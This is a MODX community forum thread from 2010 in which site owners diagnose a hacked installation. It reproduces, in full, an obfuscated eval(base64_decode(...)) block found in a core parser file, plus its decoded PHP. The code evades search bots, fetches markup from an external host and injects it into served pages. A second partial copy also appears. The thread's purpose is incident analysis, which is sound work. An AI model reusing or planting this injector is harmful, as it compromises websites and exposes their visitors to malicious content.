On March 26, 2019 we launched new MODX Forums. Please join us at the new MODX Community Forums.
Subscribe: RSS
  • Try to run this first
    http://unmaskparasites.com

    then after that this one see if an iframe pops up in source:
    http://vurldissect.co.uk/
    • Thank you wink

      but doesn’t find anything..

      Although Unmask Parasites hasn’t found anything outright suspicious on this page, Google currently lists it as potentially dangerous*
        Free MODx Graphic resources and Templates www.tattoocms.it
        -----------------------------------------------------

        MODx IT  www.modx.it
        -----------------------------------------------------

        bubuna.com - Web & Multimedia Design
      • have you tried the second link? thats what detected mine if you look at my ss in first post
        • I saw it as well. It was there for awhile and then gone. I also found a file named help_y.php in an assets/media folder. It tries to unzip itself and eval the results, but I can’t yet tell if this is related to the iframe-inf code. This was on a little-used Evo 1.0.0 site. I’ve still got the file but there is a data error generated when it tries to uncompress, so I can’t tell what it’s trying to eval.
          Matt
          • i found something very sus today.

            Chrome was reporting malware on the site - google webmasters tools reported nothing

            ive done some digging and found.

            document.parser.class.inc.php

            had

            eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCJvYl9zdGFydCIpICYmICFmdW5jdGlvbl9leGlzdHMoInphal9lYnh4cyIpICYmICFmdW5jdGlvbl9leGlzdHMoImJhZG9sX2lxaiIpICYmICFmdW5jdGlvbl9leGlzdHMoImZtaV9rcmh6IikgJiYgIWlzc2V0KCRHTE9CQUxTWyJkZGJhIl0pICYmIEBzdHJwb3Moc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pLCJnb29nbGVib3QiKSA9PT0gZmFsc2UgJiYgQHN0cnBvcyhzdHJ0b2xvd2VyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSksIm1zbmJvdCIpID09PSBmYWxzZSAmJiBAc3RycG9zKHN0cnRvbG93ZXIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSwieWFob28iKSA9PT0gZmFsc2UgJiYgIWlzc2V0KCRfQ09PS0lFWyJxaW5kIl0pICl7JEdMT0JBTFNbImRkYmEiXSA9IDE7c2V0Y29va2llKCJxaW5kIiwgMSwgdGltZSgpKzM2MDAqMjQqMiwgIi8iKTsgICAgICAgICAgICBmdW5jdGlvbiBiYWRvbF9pcWooJGd6ZW5jb2RlX2FyZykNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICR4ID0gQG9yZChAc3Vic3RyKCRnemVuY29kZV9hcmcsIDMsIDEpKTsNCiAgICAgICAgICAgICAgICAgICAgJHNoaWZ0ID0gMTA7DQogICAgICAgICAgICAgICAgICAgICRzaGlmdDIgPSAwOw0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmNCApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICR1bnBhY2s9QHVucGFjaygidiIsIHN1YnN0cigkZ3plbmNvZGVfYXJnLCAxMCwgMikpOw0KICAgICAgICAgICAgICAgICAgICAgICAgJHVucGFjaz0kdW5wYWNrWzFdOyAkc2hpZnQrPSAyICsgJHVucGFjazsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmOCApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICRzaGlmdCA9IEBzdHJwb3MoJGd6ZW5jb2RlX2FyZywgY2hyKDApLCAkc2hpZnQpICsgMTsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmMTYgKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICAkc2hpZnQgPSBAc3RycG9zKCRnemVuY29kZV9hcmcsIGNocigwKSwgJHNoaWZ0KSArIDE7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgICAgaWYoICR4JjIgKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICAkc2hpZnQgKz0gMjsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICAkZ3ppcCA9IEBnemluZmxhdGUoQHN1YnN0cigkZ3plbmNvZGVfYXJnLCAkc2hpZnQpKTsNCiAgICAgICAgICAgICAgICAgICAgaWYoJGd6aXAgPT09IEZBTFNFKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICAkZ3ppcCA9ICRnemVuY29kZV9hcmc7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgICAgcmV0dXJuICRnemlwOw0KICAgICAgICAgICAgICAgIH0NCg0KICAgIGZ1bmN0aW9uIGZtaV9rcmh6KCAkdXJsICkgew0KDQogICAgICAgIGlmIChmdW5jdGlvbl9leGlzdHMoImN1cmxfaW5pdCIpKQ0KICAgICAgICB7DQogICAgICAgICAgICAkY2ggPSBjdXJsX2luaXQoJHVybCk7DQogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDUpOw0KICAgICAgICAgICAgJGN1cmxfcmVzdWx0ID0gY3VybF9leGVjICgkY2gpOw0KICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOw0KICAgICAgICAgICAgaWYgKCRjdXJsX3Jlc3VsdCkgcmV0dXJuICRjdXJsX3Jlc3VsdDsNCiAgICAgICAgfQ0KDQovKiAgICAgICAgaWYgKEBpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSkNCiAgICAgICAgew0KICAgICAgICAgICAgJGZpbGVfcmVzdWx0ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwpOw0KICAgICAgICAgICAgaWYgKCRmaWxlX3Jlc3VsdCkgcmV0dXJuICRmaWxlX3Jlc3VsdDsNCiAgICAgICAgfSAgICovDQoNCiAgICAgICAgJHVybF9pbmZvID0gcGFyc2VfdXJsKCR1cmwpOw0KICAgICAgICAkcXVlcnkgID0gIkdFVCAkdXJsIEhUVFAvMS4wXHJcbiI7DQogICAgICAgICRxdWVyeSAuPSAiSG9zdDogIiAuICR1cmxfaW5mb1siaG9zdCJdIC4gIlxyXG4iOw0KICAgICAgICAkcXVlcnkgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxyXG4iOw0KICAgICAgICAkZnAgPSBAZnNvY2tvcGVuKCR1cmxfaW5mb1siaG9zdCJdLCA4MCk7DQogICAgICAgIGlmICghJGZwKSByZXR1cm4gZmFsc2U7DQogICAgICAgIEBmcHV0cygkZnAsICRxdWVyeSk7DQogICAgICAgIEBzb2NrZXRfc2V0X3RpbWVvdXQgKCRmcCwgNSwgMCk7DQogICAgICAgICRzX3JldGNvZGUgPSBAc3Vic3RyIChAZmdldHMgKCRmcCwgNDA5NiksIDksIDMpOw0KICAgICAgICBpZiAoJHNfcmV0Y29kZXswfSA8PiAiMiIpIHtyZXR1cm4gRkFMU0U7fQ0KICAgICAgICB3aGlsZSAoISBAZmVvZiAoJGZwKSkNCiAgICAgICAgew0KICAgICAgICAgICAgaWYgKCJcclxuIiA9PT0gQGZnZXRzICgkZnAsIDQwOTYpKSB7YnJlYWs7fQ0KICAgICAgICB9DQogICAgICAgICRzb2NrZXRfcmVzdWx0ID0gIiI7DQogICAgICAgIHdoaWxlICghIEBmZW9mICgkZnApKSB7DQogICAgICAgICAgICAkc29ja2V0X3Jlc3VsdCAuPSBAZmdldHMgKCRmcCwgNDA5Nik7DQogICAgICAgIH0NCiAgICAgICAgQGZjbG9zZSgkZnApOw0KICAgICAgICBpZiAoJHNvY2tldF9yZXN1bHQpIHJldHVybiAkc29ja2V0X3Jlc3VsdDsNCiAgICB9DQogICAgZnVuY3Rpb24gemFqX2VieHhzKCR1eG9pKXtnbG9iYWwgJGh2dnVyX3htZTtyZXR1cm4gcHJlZ19yZXBsYWNlKCIjKDwvdGFibGU+Lio8dGQ+fDwvdGFibGU+fDwvZGl2PltePD5dKjxkaXZbXjw+XSo+fDwvYm9keT4pI2lzIiwgIiQxIiAuICRodnZ1cl94bWUsIGJhZG9sX2lxaigkdXhvaSksIDEpOw0KICAgIH0kaHZ2dXJfeG1lPWZtaV9rcmh6KGJhc2U2NF9kZWNvZGUoImFIUjBjRG92TDJkamIzVnVkR1Z5TG1OdUwybHVabTh1Y0dodyIpIC4gIj9pPSIgLiAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXSk7QHByZWdfbWF0Y2goIiM8b3Blbj4oLiopPC9jbG9zZT4jIiwgJGh2dnVyX3htZSwgJG1hdGNoZXMpOyRodnZ1cl94bWU9IGlzc2V0KCRtYXRjaGVzWzFdKSA/ICRtYXRjaGVzWzFdIDogIiI7aWYgKCRodnZ1cl94bWUpICBvYl9zdGFydCgiemFqX2VieHhzIik7fQ=="));


            tacked in the bottom, the interesting thing is the timestamp on the file is normal (as per last modx update)

            that offcourse decodes to

            if(function_exists("ob_start") && !function_exists("zaj_ebxxs") && !function_exists("badol_iqj") && !function_exists("fmi_krhz") && !isset($GLOBALS["ddba"]) && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"msnbot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"yahoo") === false && !isset($_COOKIE["qind"]) ){$GLOBALS["ddba"] = 1;setcookie("qind", 1, time()+3600*24*2, "/");            function badol_iqj($gzencode_arg)
                            {
                                $x = @ord(@substr($gzencode_arg, 3, 1));
                                $shift = 10;
                                $shift2 = 0;
                                if( $x&4 )
                                {
                                    $unpack=@unpack("v", substr($gzencode_arg, 10, 2));
                                    $unpack=$unpack[1]; $shift+= 2 + $unpack;
                                }
                                if( $x&8 )
                                {
                                    $shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
                                }
                                if( $x&16 )
                                {
                                    $shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
                                }
                                if( $x&2 )
                                {
                                    $shift += 2;
                                }
                                $gzip = @gzinflate(@substr($gzencode_arg, $shift));
                                if($gzip === FALSE)
                                {
                                    $gzip = $gzencode_arg;
                                }
                                return $gzip;
                            }
            
                function fmi_krhz( $url ) {
            
                    if (function_exists("curl_init"))
                    {
                        $ch = curl_init($url);
                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                        $curl_result = curl_exec ($ch);
                        curl_close($ch);
                        if ($curl_result) return $curl_result;
                    }
            
            /*        if (@ini_get("allow_url_fopen"))
                    {
                        $file_result = @file_get_contents($url);
                        if ($file_result) return $file_result;
                    }   */
            
                    $url_info = parse_url($url);
                    $query  = "GET $url HTTP/1.0\r\n";
                    $query .= "Host: " . $url_info["host"] . "\r\n";
                    $query .= "Connection: Close\r\n\r\n";
                    $fp = @fsockopen($url_info["host"], 80);
                    if (!$fp) return false;
                    @fputs($fp, $query);
                    @socket_set_timeout ($fp, 5, 0);
                    $s_retcode = @substr (@fgets ($fp, 4096), 9, 3);
                    if ($s_retcode{0} <> "2") {return FALSE;}
                    while (! @feof ($fp))
                    {
                        if ("\r\n" === @fgets ($fp, 4096)) {break;}
                    }
                    $socket_result = "";
                    while (! @feof ($fp)) {
                        $socket_result .= @fgets ($fp, 4096);
                    }
                    @fclose($fp);
                    if ($socket_result) return $socket_result;
                }
                function zaj_ebxxs($uxoi){global $hvvur_xme;return preg_replace("#(</table>.*<td>|</table>|</div>[^<>]*<div[^<>]*>|</body>)#is", "$1" . $hvvur_xme, badol_iqj($uxoi), 1);
                }$hvvur_xme=fmi_krhz(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw") . "?i=" . $_SERVER["REMOTE_ADDR"]);@preg_match("#<open>(.*)</close>#", $hvvur_xme, $matches);$hvvur_xme= isset($matches[1]) ? $matches[1] : "";if ($hvvur_xme)  ob_start("zaj_ebxxs");}


            which is some nasty malware!!

            Im one to consider my servers rather secure, i have locked them down SUphp, phphosin and secured disabled fucntions etc, i make use of CXS for monitoring FTP and form uploads for known finger prints and any encoded uploads...

            It didnt detect anything, interestingly when i run it now on my home dir this does locate the file above. so this means it was NOT uploaded via FTP - im thinking there a loose injection somewhere.

            let me know if you need any info

            Im going to do a delete of all modx files and reupload fresh, in case there’s any old files (i usually use the overwrite upgrade method, so there could be old files floating)
            • the same code in my document.parser.class.inc.php sad

              eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCJvYl9zdGFydCIpICYmICFmdW5jdGlvbl9leGlzdHMoInBpcmpfY3RoaiIpICYmICFmdW5jdGlvbl9leGlzdHMoInZteV9xYmx1IikgJiYgIWZ1bmN0aW9uX2V4aXN0cygidHZ5ZW9fZmdrbyIpICYmICFpc3NldCgkR0xPQkFMU1siY2JjZSJdKSAmJiBAc3RycG9zKHN0cnRvbG93ZXIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSwiZ29vZ2xlYm90IikgPT09IGZhbHNlICYmIEBzdHJwb3Moc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pLCJtc25ib3QiKSA9PT0gZmFsc2UgJiYgQHN0cnBvcyhzdHJ0b2xvd2VyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSksInlhaG9vIikgPT09IGZhbHNlICYmICFpc3NldCgkX0NPT0tJRVsicXVrbG8iXSkgKXskR0xPQkFMU1siY2JjZSJdID0gMTtzZXRjb29raWUoInF1a2xvIiwgMSwgdGltZSgpKzM2MDAqMjQqNSwgIi8iKTsgICAgICAgICAgICBmdW5jdGlvbiB2bXlfcWJsdSgkZ3plbmNvZGVfYXJnKQ0KICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgJHggPSBAb3JkKEBzdWJzdHIoJGd6ZW5jb2RlX2FyZywgMywgMSkpOw0KICAgICAgICAgICAgICAgICAgICAkc2hpZnQgPSAxM
                Free MODx Graphic resources and Templates www.tattoocms.it
                -----------------------------------------------------

                MODx IT  www.modx.it
                -----------------------------------------------------

                bubuna.com - Web & Multimedia Design
              • Quote from: banzai at Aug 05, 2010, 01:15 PM

                the same code in my document.parser.class.inc.php sad

                eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCJvYl9zdGFydCIpICYmICFmdW5jdGlvbl9leGlzdHMoInBpcmpfY3RoaiIpICYmICFmdW5jdGlvbl9leGlzdHMoInZteV9xYmx1IikgJiYgIWZ1bmN0aW9uX2V4aXN0cygidHZ5ZW9fZmdrbyIpICYmICFpc3NldCgkR0xPQkFMU1siY2JjZSJdKSAmJiBAc3RycG9zKHN0cnRvbG93ZXIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSwiZ29vZ2xlYm90IikgPT09IGZhbHNlICYmIEBzdHJwb3Moc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pLCJtc25ib3QiKSA9PT0gZmFsc2UgJiYgQHN0cnBvcyhzdHJ0b2xvd2VyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSksInlhaG9vIikgPT09IGZhbHNlICYmICFpc3NldCgkX0NPT0tJRVsicXVrbG8iXSkgKXskR0xPQkFMU1siY2JjZSJdID0gMTtzZXRjb29raWUoInF1a2xvIiwgMSwgdGltZSgpKzM2MDAqMjQqNSwgIi8iKTsgICAgICAgICAgICBmdW5jdGlvbiB2bXlfcWJsdSgkZ3plbmNvZGVfYXJnKQ0KICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgJHggPSBAb3JkKEBzdWJzdHIoJGd6ZW5jb2RlX2FyZywgMywgMSkpOw0KICAgICAgICAgICAgICAgICAgICAkc2hpZnQgPSAxM


                can you advise if the file time stamp is different then the surrounding files?
                • the time stamp it’s the same of other modx files (last modx update) sad
                    Free MODx Graphic resources and Templates www.tattoocms.it
                    -----------------------------------------------------

                    MODx IT  www.modx.it
                    -----------------------------------------------------

                    bubuna.com - Web & Multimedia Design
                  • I recall a rash of compromises from an Acrobat related security hole a while back. They basically logged your passwords and forwarded them on, giving folks "regular" access to the system that way.
                      Ryan Thrash, MODX Co-Founder
                      Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
                    • Quote from: rthrash at Aug 05, 2010, 02:00 PM

                      I recall a rash of compromises from an Acrobat related security hole a while back. They basically logged your passwords and forwarded them on, giving folks "regular" access to the system that way.

                      ive gone through the FTP logs, theres no entries from anyone other then myself. that file hasnt been touched via FTP since i uploaded during my last update

                      any other ideas? bit odd that we both have the same file infected, - modx is the only software running under this webroot.

                      i cant see any calls in the https logs to the file directly